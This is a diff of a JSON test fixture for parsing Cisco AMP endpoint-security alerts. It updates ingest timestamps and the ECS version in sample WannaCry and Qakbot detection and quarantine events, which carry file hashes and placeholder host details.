@@ -4971,7 +4971,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:29.843681225Z", + "ingested": "2021-09-13T18:07:04.510440850Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419281588302905000,\"timestamp\":1610647432,\"timestamp_nanoseconds\":396000000,\"date\":\"2021-01-14T18:03:52+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419281588302905443\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\",\"sha1\":\"e889544aff85ffaf8b0d0da705105dee7c97fe26\",\"md5\":\"db349b97c37d22f5ea1d1841e3c89eb4\"},\"parent\":{\"process_id\":708,\"disposition\":\"Clean\",\"file_name\":\"lsass.exe\",\"identity\":{\"sha256\":\"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71\",\"sha1\":\"7abcc82dc5a05b4f53fd0fbd386738e5555025cf\",\"md5\":\"4e568dbe3fff1a0025eb432dc929b78f\"}}}}}", "kind": "alert", "action": "Threat Detected", 
@@ -5028,7 +5028,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ @@ -5048,7 +5048,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:29.843683113Z", + "ingested": "2021-09-13T18:07:04.510442708Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419281588302905000,\"timestamp\":1610647432,\"timestamp_nanoseconds\":927000000,\"date\":\"2021-01-14T18:03:52+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419281588302905443\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}", "kind": "alert", "action": "Threat Quarantined", @@ -5099,7 +5099,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ 
@@ -5119,7 +5119,7 @@ }, "event": { "severity": 3, - "ingested": "2021-09-12T17:31:29.843684983Z", + "ingested": "2021-09-13T18:07:04.510444555Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411538569722069000,\"timestamp\":1610646679,\"timestamp_nanoseconds\":495000000,\"date\":\"2021-01-14T17:51:19+00:00\",\"event_type\":\"Retrospective Quarantine Attempt Failed\",\"event_type_id\":2164260893,\"detection_id\":\"6411538569722068995\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff\"}}}}", "kind": "alert", "action": "Retrospective Quarantine Attempt Failed", @@ -5174,7 +5174,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ 
@@ -5194,7 +5194,7 @@ }, "event": { "severity": 3, - "ingested": "2021-09-12T17:31:29.843686880Z", + "ingested": "2021-09-13T18:07:04.510446430Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411538569722069000,\"timestamp\":1610646679,\"timestamp_nanoseconds\":495000000,\"date\":\"2021-01-14T17:51:19+00:00\",\"event_type\":\"Retrospective Quarantine Attempt Failed\",\"event_type_id\":2164260893,\"detection_id\":\"6411538569722068994\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff\"}}}}", "kind": "alert", "action": "Retrospective Quarantine Attempt Failed", @@ -5249,7 +5249,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ 
@@ -5269,7 +5269,7 @@ }, "event": { "severity": 3, - "ingested": "2021-09-12T17:31:29.843688761Z", + "ingested": "2021-09-13T18:07:04.510448315Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411538569722069000,\"timestamp\":1610646679,\"timestamp_nanoseconds\":495000000,\"date\":\"2021-01-14T17:51:19+00:00\",\"event_type\":\"Retrospective Quarantine\",\"event_type_id\":553648155,\"detection_id\":\"6411538569722068993\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff\"}}}}", "kind": "alert", "action": "Retrospective Quarantine", @@ -5322,7 +5322,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ 
@@ -5346,7 +5346,7 @@ }, "event": { "severity": 3, - "ingested": "2021-09-12T17:31:29.843690628Z", + "ingested": "2021-09-13T18:07:04.510450164Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411538569722069000,\"timestamp\":1610646679,\"timestamp_nanoseconds\":495000000,\"date\":\"2021-01-14T17:51:19+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"Auto.BAC7BC5281.in10.tht.Talos\",\"detection_id\":\"6411538569722068995\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"igvj$vN.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\Documents\\\\igvj$vN.exe\",\"identity\":{\"sha256\":\"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff\"}}}}", "kind": "alert", "action": "Retrospective Detection", @@ -5401,7 +5401,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ 
@@ -5425,7 +5425,7 @@ }, "event": { "severity": 3, - "ingested": "2021-09-12T17:31:29.843705689Z", + "ingested": "2021-09-13T18:07:04.510452021Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411538569722069000,\"timestamp\":1610646679,\"timestamp_nanoseconds\":495000000,\"date\":\"2021-01-14T17:51:19+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"Auto.BAC7BC5281.in10.tht.Talos\",\"detection_id\":\"6411538569722068994\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"6951045.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\Temp\\\\6951045.exe\",\"identity\":{\"sha256\":\"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff\"}}}}", "kind": "alert", "action": "Retrospective Detection", @@ -5482,7 +5482,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ 
@@ -5508,7 +5508,7 @@ }, "event": { "severity": 3, - "ingested": "2021-09-12T17:31:29.843709643Z", + "ingested": "2021-09-13T18:07:04.510453895Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411538569722069000,\"timestamp\":1610646679,\"timestamp_nanoseconds\":495000000,\"date\":\"2021-01-14T17:51:19+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"Auto.BAC7BC5281.in10.tht.Talos\",\"detection_id\":\"6411538569722068993\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"MspthrdHash.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\MspthrdHash\\\\MspthrdHash.exe\",\"identity\":{\"sha256\":\"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff\",\"sha1\":\"99fffe78e0cbd7b508eed13a8633903dd89ed5f1\",\"md5\":\"dc41e47ebba549ec5e616ed9e88a0376\"}}}}", "kind": "alert", "action": "Retrospective Detection", @@ -5561,7 +5561,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ 
@@ -5581,7 +5581,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:29.843711565Z", + "ingested": "2021-09-13T18:07:04.510455739Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275399255032000,\"timestamp\":1610645991,\"timestamp_nanoseconds\":812000000,\"date\":\"2021-01-14T17:39:51+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419275399255031906\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "kind": "alert", "action": "Quarantine Failure", @@ -5636,7 +5636,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ 
@@ -5656,7 +5656,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:29.843713424Z", + "ingested": "2021-09-13T18:07:04.510457608Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275399255032000,\"timestamp\":1610645991,\"timestamp_nanoseconds\":297000000,\"date\":\"2021-01-14T17:39:51+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419275399255031905\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "kind": "alert", "action": "Quarantine Failure", @@ -5711,7 +5711,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ 
@@ -5731,7 +5731,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:29.843715300Z", + "ingested": "2021-09-13T18:07:04.510459484Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275399255032000,\"timestamp\":1610645991,\"timestamp_nanoseconds\":297000000,\"date\":\"2021-01-14T17:39:51+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419275399255031904\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "kind": "alert", "action": "Quarantine Failure", @@ -5786,7 +5786,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ 
@@ -5806,7 +5806,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:29.843717182Z", + "ingested": "2021-09-13T18:07:04.510461339Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275399255032000,\"timestamp\":1610645991,\"timestamp_nanoseconds\":297000000,\"date\":\"2021-01-14T17:39:51+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419275394960064606\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "kind": "alert", "action": "Quarantine Failure", @@ -5861,7 +5861,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ 
@@ -5881,7 +5881,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:29.843719050Z", + "ingested": "2021-09-13T18:07:04.510463204Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275399255032000,\"timestamp\":1610645991,\"timestamp_nanoseconds\":281000000,\"date\":\"2021-01-14T17:39:51+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419275394960064605\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "kind": "alert", "action": "Quarantine Failure", @@ -5936,7 +5936,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ 
@@ -5956,7 +5956,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:29.843721187Z", + "ingested": "2021-09-13T18:07:04.510465143Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275399255032000,\"timestamp\":1610645991,\"timestamp_nanoseconds\":281000000,\"date\":\"2021-01-14T17:39:51+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419275394960064607\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "kind": "alert", "action": "Quarantine Failure", @@ -6011,7 +6011,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ 
@@ -6031,7 +6031,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:29.843723102Z", + "ingested": "2021-09-13T18:07:04.510467022Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275399255032000,\"timestamp\":1610645991,\"timestamp_nanoseconds\":281000000,\"date\":\"2021-01-14T17:39:51+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419275394960064604\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "kind": "alert", "action": "Quarantine Failure", @@ -6086,7 +6086,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ 
@@ -6106,7 +6106,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:29.843725006Z", + "ingested": "2021-09-13T18:07:04.510468869Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275399255032000,\"timestamp\":1610645991,\"timestamp_nanoseconds\":281000000,\"date\":\"2021-01-14T17:39:51+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419275394960064603\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "kind": "alert", "action": "Quarantine Failure", @@ -6161,7 +6161,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ 
